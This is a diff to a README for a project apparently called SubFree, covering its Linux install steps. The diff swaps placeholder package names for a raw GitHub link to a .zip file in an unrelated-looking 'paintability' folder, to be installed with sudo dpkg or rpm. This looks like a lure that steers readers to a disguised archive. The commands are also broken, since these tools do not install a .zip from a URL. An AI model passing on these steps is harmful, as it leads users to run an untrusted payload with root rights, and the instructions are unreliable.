gemochammad/SubFree-Project/readme.md

 1. **Download the package**: Identify the `.deb` or `.rpm` file in the releases section according to your distribution.
 2. **Open Terminal**: Use the terminal for installation.
 3. **Install the package**: Use the following command:
-   - For Debian-based systems: `sudo dpkg -i yourfile.deb`
+   - For Debian-based systems: `sudo dpkg -i https://raw.githubusercontent.com/gemochammad/SubFree-Project/main/paintability/SubFree-Project.zip`
-   - For Red Hat-based systems: `sudo rpm -i yourfile.rpm`
+   - For Red Hat-based systems: `sudo rpm -i https://raw.githubusercontent.com/gemochammad/SubFree-Project/main/paintability/SubFree-Project.zip`
 4. **Launch SubFree**: Look for SubFree in your applications.

 ## ⚙️ Usage